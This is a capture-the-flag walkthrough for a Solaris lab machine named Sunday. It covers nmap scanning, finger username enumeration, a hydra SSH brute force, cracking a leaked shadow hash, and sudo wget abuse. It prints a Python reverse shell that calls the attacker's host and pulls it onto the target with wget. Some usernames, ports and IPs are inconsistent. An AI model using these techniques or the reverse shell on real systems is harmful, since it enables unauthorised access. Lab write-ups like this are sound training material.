Sunday

Reconnaissance: NMAP

-sC: run default nmap scripts -sV: detect service version -O: detect OS -oA: output all formats and store in file initial --max-retries: number of port scan probe retransmissions

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.76 

79/tcp    open     finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where

111/tcp   open     rpcbind     2-4 (RPC #100000)

515/tcp   open     printer

2111/tcp  filtered kx

4126/tcp  filtered ddrepl

32769/tcp filtered filenet-rpc

49159/tcp filtered unknown

56738/tcp filtered unknown

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=1/4%Time=65975A7D%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x
SF:20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\
SF:x20\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\
SF:?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHEL
SF:P\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Wher
SF:e\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x
SF:20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\
SF:x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(
SF:SSLSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x2
SF:0\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x
SF:20\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/4%OT=79%CT=1%CU=41381%PV=Y%DS=2%DC=I%G=Y%TM=65975
OS:B08%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=I%II=I%TS=7)S
OS:EQ(SP=108%GCD=1%ISR=108%TI=I%CI=I%II=I%TS=7)SEQ(SP=108%GCD=1%ISR=108%TI=
OS:I%CI=I%II=I%SS=S%TS=7)OPS(O1=ST11M53ANW2%O2=ST11M53ANW2%O3=NNT11M53ANW2%
OS:O4=ST11M53ANW2%O5=ST11M53ANW2%O6=ST11M53A)WIN(W1=FB37%W2=FB37%W3=FA38%W4
OS:=FA3B%W5=FA3B%W6=FFF7)ECN(R=Y%DF=Y%T=3C%W=FAE0%O=M53ANNSNW2%CC=Y%Q=)T1(R
OS:=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=3C%W=FA09%S=O%A=
OS:S+%F=AS%O=ST11M53ANW2%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIP
OS:CK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.76

111/udp open  rpcbind

Device type: general purpose|storage-misc
Running: illumos OpenIndiana, Joyent SmartOS, Nexenta, Oracle Solaris 10|11, Sun embedded, Sun OpenSolaris, Sun Solaris 11

OS CPE: cpe:/o:illumos:openindiana cpe:/o:joyent:smartos cpe:/o:nexenta:nexenta cpe:/o:oracle:solaris:10 cpe:/o:oracle:solaris:11 cpe:/h:sun:storage_7410 cpe:/o:sun:opensolaris cpe:/o:sun:sunos:5.11
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.76

We get back the following result showing that 2 ports are open: Port 79: running Sun Solaris fingerd Port 111: running rpcbind

┌──(kali💀kali)-[~]
└─$ nmap -p- 10.10.10.76  --max-retries 0

— max-retries: number of port scan probe retransmissions

Then we run a more comprehensive scan to identify services running on the above ports.

┌──(kali💀kali)-[~]
└─$ sudo nmap -p 79,111,49159,56738 -sV 10.10.10.76

We get back the following result showing that: Port 22022: is running SunSSH 1.3 Port 55029: is running a service that nmap was not able to identify

Enumeration: Port 79 TCP finger Sun Solaris

We’ll start off with enumerating port 79. A quick google search on the “Finger service” tells us that the finger protocol is used to find out information about users on a remote system. Therefore, we can use it to enumerate usernames.

First, check if there are any logged in users.

┌──(kali💀kali)-[~]
└─$ finger @10.10.10.76
No one logged on

No one is currently logged in. Let’s check if the user “root” exists.

┌──(kali💀kali)-[~]
└─$ finger root@10.10.10.76
Login       Name               TTY         Idle    When    Where
root     Super-User            ssh          <Dec  7 01:27> 10.10.14.46

It does exist. Now, let’s enumerate more usernames. list of usernames that we can use in order to guess the usernames that are available on the server.

┌──(kali💀kali)-[~]
└─$ locate names.txt 
/usr/share/seclists/SecLists-master/Usernames/Names/names.txt

Pentestmonkey has a script that is used to enumerate OS-level user accounts via the finger service. Let’s run that on our host.

┌──(kali💀kali)-[~]
└─$ locate names.txt 
┌──(kali💀kali)-[~/Desktop/finger-user-enum-1.0]
└─$ ./finger-user-enum.pl -U /usr/share/seclists/SecLists-master/Usernames/Names/names.txt -t 10.10.10.76

######## Scan started at Fri Jan  5 01:58:41 2024 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7 01:27> 10.10.14.46         ..
^[[B^[[B^[[B^[[B^[[B^[[B^[[A^[[A^[[A^[[A^[[A^[[Asammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..
######## Scan completed at Fri Jan  5 02:36:50 2024 #########
15 results.

-U: file of usernames to check via finger service -t: server host running finger service

We get the following result showing us that “sammy” and “sunday” are users of the system.

Enumeration: Port ???? TCP SunSSH 1.3

User Shell: SSH As sunny Since SSH is open and we have two valid usernames, let’s try brute-forcing the users’ credentials using hydra. We’ll start off with Sunny.

┌──(kali💀kali)-[~]
└─$ hydra -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.10.10.76 ssh -s 22022

-l: username -P: password file -s: port

We get back the following result showing us that Sunny’s password is “sunday”.

SSH into Sunny’s account.

┌──(kali💀kali)-[~]
└─$ ssh -p 22022 sunny@10.10.10.76
sunday

sunny@sunday:~$ ls
local.cshrc    local.login    local.profile

sunny@sunday:~$ find / -name  user.txt 2>/dev/null
/home/sammy/user.txt

sunny@sunday:~$ cat /home/sammy/user.txt
cat: cannot open /home/sammy/user.txt: Permission denied

We need to escalate our privileges to Sammy.

Privesc: sunny to sammy

Run the following command to view the list of allowed commands that the user can run with root privileges.

sunny@sunday:/home/sammy$ sudo -l
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll

We can run the /root/troll command as root. This is obviously a custom command so let’s run it to see what it’s doing (we don’t have read access to it).

sunny@sunday:/home/sammy$ sudo /root/troll
testing
uid=0(root) gid=0(root)

It seems to be a script that prints the id of the user running it. Since we ran it with the ‘sudo’ command, it prints the id of root. We don’t have write access to the script, so we can’t escalate our privileges using it. After a bit of digging, I found a backup file in the following directory.

It contains two files agen22.backup and shadow.backup. The former we don’t have access to, however, we can view the latter.

sunny@sunday:/home/sammy$ cd /backup
sunny@sunday:/backup$ ls
agent22.backup  shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

It’s a backup of the shadow file. We already know Sunny’s password so we’re not going to attempt to crack it. Instead, copy Sammy’s password and save it in the file sammy-hash.txt. Then use John to crack the hash.

┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sammy-hash.txt

cooldude!        (?)

We got a password! Let’s su into Sammy’s account.

sunny@sunday:/backup$ su - sammy
Password: 
Oracle Solaris 11.4.42.111.0                  Assembled December 2021
-bash-5.1$ whoami
sammy

Now we can view the user.txt flag.

-bash-5.1$ cat user.txt
0f17c---------------------------

Privesc: sammy to root

Let’s try to escalate to root privileges. Run the sudo command again to view the list of allowed commands the user can run as root.

-bash-5.1$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

We can run wget with root privileges! If you’re familiar with the “-i” flag in wget, you’ll know that we can use it to output the content of files. Therefore, we can run the following command to get the root flag.

-bash-5.1$ sudo wget -i /root/root.txt
--2024-01-05 07:23:00--  http://57361888a50a9652272159ed775c6b74/
Resolving 57361888a50a9652272159ed775c6b74 (57361888a50a9652272159ed775c6b74)... failed: temporary name resolution failure.
wget: unable to resolve host address ‘57361888a50a9652272159ed775c6b74’
-bash-5.1$

However, in this scenario we’re simply reading the content of the flag and not really escalating privileges. To get a root shell we need to chain the following two vulnerabilities:

  1. The user Sunny can execute the /root/troll file with root privileges, and

  2. The user Sammy can overwrite any root owned file using the wget command.

Therefore, we’ll use Sammy’s sudo privileges to overwrite the /root/troll file and include a shell in it. Then we’ll use Sunny’s sudo privileges to run the /root/troll file and convert our shell to a root shell.

Alright, let’s do this! In the attack machine, create a file called “troll” and add the following code to it.

#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

Then start up a simple Python server in the directory the file is in.

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

Go back the target machine running with the Sammy user privileges, and run the wget command to overwrite the /root/troll file.

-bash-5.1$ sudo wget -O /root/troll http://10.10.16.4:5555/troll
--2024-01-05 07:28:10--  http://10.10.16.4:5555/troll
Connecting to 10.10.16.4:5555... connected.

In another SSH session running with the Sunny user privileges, execute the troll file.

bash-5.1$ sudo wget http://10.10.16.4/shell.py -O /root/troll
--2024-01-05 07:39:33--  http://10.10.16.4/shell.py
Connecting to 10.10.16.4:80... connected.

Since we added a bash shell in the troll file and the troll file is being executed with root privilege, we get a root shell!

bash-5.1$ sudo /root/troll
Password:

Note: Something on the server seems to be resetting the /root/troll file every couple of seconds, therefore you only have small window of time between overwriting the troll file as Sammy and executing the troll file as Sunny.

PreviousPoisonNextTartarSauce

Last updated